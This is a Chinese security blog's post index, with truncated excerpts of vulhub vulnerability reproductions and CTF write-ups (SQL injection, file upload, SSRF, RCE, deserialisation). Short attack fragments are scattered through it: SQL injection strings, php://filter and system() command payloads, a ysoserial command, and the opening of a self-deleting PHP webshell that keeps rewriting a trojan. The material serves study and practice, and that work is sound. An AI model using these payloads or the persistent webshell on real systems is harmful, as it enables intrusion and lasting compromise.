- 博客(76)
- 收藏
- 关注
RSS订阅原创 vulhub漏洞复现-Nginx
Nginxnginx是一个高性能的HTTP和反向代理web服务器。思路在关闭了pathinfo的情况下,只有.php后缀的文件才会被发送给fastcgi解析。而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则\.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi,而Fastcgi根据SCRIPT_FILENAM
2021-10-28 19:43:41
4961
原创 vulhub漏洞复现-Apache Spark 未授权访问漏洞
SparkApache Spark 是专为大规模数据处理而设计的快速通用的计算引擎,一个完整的的动力核心,负责计算中数据的来源,数据的操作,数据的管理 并将合适的计算结果根据要求给予返回。处理数据处理的目的不同会有很多不同的类别。思路未授权的用户可以向管理节点提交一个应用,这个应用实际上是恶意代码。提交方法有两种利用 REST API利用 submissions 网关(集成在 7077 端口中)参考 Apache Spark 未授权访问漏洞 漏洞复现docker部署环境时将以 stand
2021-10-28 09:43:32
4418
原创 vulhub漏洞复现-Apache Shiro(CVE-2016-4437) 反序列化漏洞复现
Apache ShiroApache Shiro是一个强大且易用的Java安全框架,用来执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。思路Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。在识别身份的时候,
2021-10-22 11:41:01
3666
原创 vulhub漏洞复现-Gitlist 0.6.0(cve-2018-1000533)远程命令执行漏洞
Gitlistgitlist是一款使用PHP开发的图形化git仓库查看工具。思路在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令:public function searchTree($query, $branch){ if (empty($query)) { return null; } $query = escapeshellarg($query); try { $results = $this-&
2021-10-20 21:58:41
5369
1
原创 ctfshow文件上传
web151-前端绕过提示前台校验不可靠,上传png图片,burp抓包修改为php任意命令执行这里关闭js的话点击上传图片就没有反应了。web152-后端绕过一模一样的步骤,应该上一题前端判断的做法是修改前端代码吧web153-.user.ini绕过这里要上传user.ini进行文件上传绕过简单理解就是.user.ini文件中有一个auto_prepend_file = <filename> //包含在文件头配置项,它的作用的是在同目录.php文件中包含<filen
2021-10-20 20:04:29
3228
原创 BUUCTF(2)
[GXYCTF2019]BabyUpload 1 htaccess+phtml[BJDCTF2020]The mystery of ip1[RoarCTF 2019]Easy Java 1[BUUCTF 2018]Online Tool 1 [GXYCTF2019]禁止套娃 1 无字符RCE[GWCTF 2019]我有一个数据库 1
2021-10-12 21:27:31
3026
原创 vulhub漏洞复现-saltstack(CVE-2020-11651、CVE-2020-11652)越权命令执行/遍历目录
SaltStack基于Python开发的一套C/S架构配置管理工具,通过部署SaltStack,可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等,简单来说就是可以集中管理各种各样的服务器,但在 SaltStack < 2019.2.4,SaltStack < 3000.2版本中出现了认证绕过漏洞,通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程任意命令执行
2021-10-10 09:15:22
4758
原创 vulhub漏洞复现- Log4j(CVE-2017-5645)Apache Log4j Server 反序列化命令执行漏洞
Apache Log4j ServerApache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器,能够控制日志的输出格式与目的地。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码思路利用ysoserial生成payload,然后直接发送给your-ip:4712端口即可漏洞复现把ysoserial.jar文件放到网盘里百度网盘密码:613ajava -jar ysoserial-0.0.6-SNAPSHOT-all.jar
2021-10-07 20:00:52
4439
原创 vulhub漏洞复现-apereo-cas反序列化命令执行漏洞复现
Apereo-Cas统一认证 - Apereo CAS 简介微服务是将单一应用程序划分成一组小的服务,服务之间互相协调、互相配合。而每个这样的小服务可能都得进行安全验证,如果每个小的服务都得独自安全验证处理的话,就太麻烦了,所以就出现了统一处理这些安全相关的认证或授权的服务,这些服务中比较出名的有Apereo CAS ,Keycloak思路4.1.7版本之前网站使用了Webflow框架(和wordpress差不多),漏洞出现在登陆时默认密钥changeit处,我们可以利用工具生成恶意payload去
2021-10-05 20:19:30
4531
原创 ctfshowSSRF
web351 <?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result=curl_exec($ch);curl_close($ch);echo ($result);?> 没有防护直
2021-10-02 20:05:44
3555
原创 ctfshow文件包含
web78 无防护读取源码 <?phpif(isset($_GET['file'])){ $file = $_GET['file']; include($file);}else{ highlight_file(__FILE__);} 伪协议读取后base64解密php://filter/read=convert.base64-encode/resource=flag.phpweb79 data协议 <?php if(isset($_GET['file
2021-09-18 19:36:17
3383
原创 ctfshow反序列化
web254if($user->login($username,$password)){ if($user->checkVip()){ $user->vipOneKeyGetFlag(); }判断输入的username和password是否等于题目给出的xxxxxx,验证成功就给flag,所以直接get传参?username=xxxxxx&password=xxxxxxweb255比254多了一个$user =
2021-09-14 22:01:07
4648
原创 ctfshow代码审计
web301直接把源码下载下来$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";$result=$mysqli->query($sql);$row=$result->fetch_array(MYSQLI_BOTH);if($result->num_rows<1){ $_SESSION['error']="1"; header("
2021-08-27 16:13:07
3464
原创 ctfshowPHP特性
web89 <?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }} 数组绕过正则表达式,也就是说我们不按规定去
2021-08-23 15:19:12
4513
3
原创 ctfshow爆破
web21登陆抓包发现账号密码被加密,这里先解密发现中间用一个冒号隔开了,发到Intruder模块进行爆破利用题目所给的字典(重命名为.zip,再解压出来),在Payload1后添加:后缀,对Payload1、2进行base64加密Payload set 1Payload set 2因为这样跑需要跑太多次了,这里已经知道账号就是admin了,直接对密码进行爆破。发送到重放模块得到flagweb22web23web24web25web26web27web28...
2021-08-19 15:01:47
3066
原创 ctfshow命令执行
web29 <?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);} 对flag进行过滤,利用eval进行命令执行?c=system("ls");?c=system("cat fl*");查看页面源代码得到
2021-08-18 16:31:18
3295
原创 php的内存马的原理与查杀方法
内存马原理PHP内存马即PHP不死马,简单来说就是会写进PHP进程里,无限在指定目录中生成木马文件生成过程不死马.php → 上传到server → server执行文件 → server本地循环不断生成一句话木马不死马初代<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '2.php';$code = '<?php if(md5($_GET["pass"])=="1a1dc91
2021-08-11 14:07:16
7453
原创 DNSlog
什么是DNSlogDNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。原理payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog的平台上,通过读取这些解析的日志,来获取信息。使用方法通过Burp Suite通过在线平台http://www.dnslog.cn/http://ceye.io/利用场景执行命令时没
2021-08-08 17:59:40
9548
原创 轻量应用服务器+宝塔
你还在为配置时不断出错而发愁吗?你是否被出问题时不断百度而又不断报出新问题所困扰?你是否又因为找不出问题而要重置系统,这种前功尽弃的感觉让你时常处于破防的边缘?家人们!系统镜像CentOS+宝塔一键部署wordpress+主题 = 个人博客,如此聪(lan)明(duo)的方法搭建博客 = 有手就行。系统镜像CentOS在购买服务器时可选择,或者在服务器信息中重置系统可选择宝塔安装宝塔,远程连接服务执行各种命令可以使用浏览器直接发起的连接也可以通过SSH客户端软件(如Putty、Xshell)
2021-08-03 18:47:20
2826
5
原创 CTFweb无参数RCE
1打开题目便是源代码,通过a的参数来实现RCE <?php#-*-coding: utf-8 -*-//flag in show_flag.phpif(isset($_POST['a'])){ $a=$_POST['a']; if (!(preg_match("/[0-9]|\.|data|phar|glob|\*|system|shell_exec|shell|php|\`/i", $a))) { eval($a); }}else{ hig
2021-07-25 21:32:39
3073
原创 BUUCTF
[HCTF 2018]WarmUp过程1.找源代码右键查看源代码或者F12发现提示看到还有一个hint.php,再访问一下2.分析源代码 if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file'];
2021-07-18 19:24:25
3728
2
原创 安全狗安装
一.前言二.下载安装环境部署专门把下载安装环境部署放到这里讲一下,因为我当时被困扰了一个多少小时,网上查了好多,也问了网上一些人,最后最后才找到一篇能解决的,不问不知道,被安装部署困扰到的人还真不少,这里我把我安装过程中踩到的坑都写出来,再附上正确安装步骤。1.下载这里我就直接贴上下载地址,当时我是搜的网站安全狗进去以后指一下免费下载,然后点击2.服务名我觉得这里就算是一个小坑了,我也是卡在这里好长时间,打开看见一个服务名,不知道该写啥,贴一个环境配置视频吧,这上面说用的是phpstud
2021-05-25 20:13:53
9212
7
原创 XMind 2020 XSS漏洞复现
一.前言漏洞危害:可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害,我看网上相关复现文章都贴着这句话,其实也就是这样的,XMind xss漏洞的确可以被利用执行一些像弹窗,执行命令(经典ipconfig命令,弹计算器),以及配合cs的使用,如果真的有有心人去利用这个漏洞的话,也是很容易中招的。下面放上下载地址。下载地址下载XMind 2020版本二.漏洞利用1.xss弹窗创建写入命令在思维导图红色部分(不止红
2021-05-25 10:22:38
2288
4
原创 upload-labs
1234567891011121314151617181920第一关源代码function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传
2021-05-19 19:03:19
2213
原创 CTFHub之SSRF
SSRF原理SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的
2021-04-24 18:40:38
2062
原创 CTFHub之RCE
应用有时需要调用一些执行系统命令的函数,当服务器没有经过严格过滤用户的参数,这时候就可能导致命令执行,从而导致命令执行漏洞常用命令执行函数system(): 该函数会把执行结果输出。passthru(): 该函数只调用命令,并把运行结果原样地直接输出没有返回值exec(): 不输出结果,返回执行结果地最后一行shell_exec(): 不输出结果,返回执行结果eval执行源代码就在脸上 <?phpif (isset($_REQUEST['cmd'])) { eva
2021-04-17 18:14:16
1543
原创 CTFHub之文件上传
MIME绕过知识点MIME((Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类,也就是我们抓包时常见的Content-Type。常见的MIME类型,例如:超文本
2021-04-17 11:43:56
1392
原创 sqli-labs 46-65
第46关知识点asc:指定列按升序排列 select * from users order by 1 asc;desc:指定列按降序排列selec * from users order by 1 descRight(数据,数字):从数据的右边开始前数字个字母为select Right(database(),1);Left(数据,数字):从数据的左边开始前数字个字母为select Left(database(),1)lines terminated by xxx:最后写好的句子会以xxx结尾方法
2021-04-10 12:18:25
1150
原创 sqli-labs 38-45
第38关堆叠注入:简单理解就是一条语句结束后再连接一条语句,这就叫堆叠注入。举几个最简单的例子:查询数据并创建一个数据库:select * from users;creat database test;查询数据并删除一个数据库:select * from users;drop database test;查询数据并插入数据:select * from users;insert into users(id,username,password) values(‘id’,‘username’,‘pas
2021-04-09 22:27:25
1139
原创 Sqli-Labs 23-37
第23关看到页面就知道与前几关有所不同,没有了登录框,这里我用HackBar进行注入。尝试?id=1'时报错,接下来尝试?id=1' order by 3--+,发现仍然报错,并且报错信息中有LIMIT 0,1',在这里这个应该被注释掉,难道是注释符的问题,尝试用#,%23,;%00进行注释,发现当注释符为;%00时,正常显示。所以使用联合注入,方法与之前相同,直接爆个信息-1' union select 1,group_concat(id,username,0x7e,password),3 fr
2021-04-09 17:09:25
1359
原创 Sqli-Labs 11-22
第11关尝试输入用户名密码admin直接万能注入语法 ‘or 1= 1# 正确,则说明闭合方式为单引号闭合。查询有多少字段,当 -1’ order by 3# 时 则说明有两个字段。接下来就可以联合注入来爆数据库名,表名,列名,信息。(1)数据库-1' union select 1,database()#数据库名为security。(2)表名-1' union select 1,group_concat(table_name) from infor
2021-04-07 12:17:20
1189
原创 DVWA全等级通关教程(完结)
Low源代码:<?phpif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE use
2021-03-14 16:57:18
8445
2
原创 工具使用(kali linux 中 nmap msf cs docker Goby)
一.docker简介 docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口,简单来说。就是能轻松的为应用创建一个轻量级的、可移植的、自给自足的容器(类似虚拟机并且具有自己的优势)。二.常用命令1.docker启动和停止启动dockersystemctl start docker停止dockersystemctl stop d
2021-01-31 20:30:04
4701
2
原创 计算机网络开放的常用端口
一.概述计算机端口号总数:65535,一般用到的是1~65535,0一般不使用。0-1023:系统端口,也叫公认端口,是为软件保留的。1024~65535:用户端口。1024-5000: 临时端口,一般的应用程序使用1024到4999来进行通讯。5001-65535:∶服务器(非特权)端口,用来给用户自定义端口。二.常用端口端口服务作用20、21FTPFTP服务器以及客户端所开放的端口,用于上传、下载。进行FTP文件传输中,客户端首先连接到FTP服务器
2021-01-23 13:41:58
3731
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人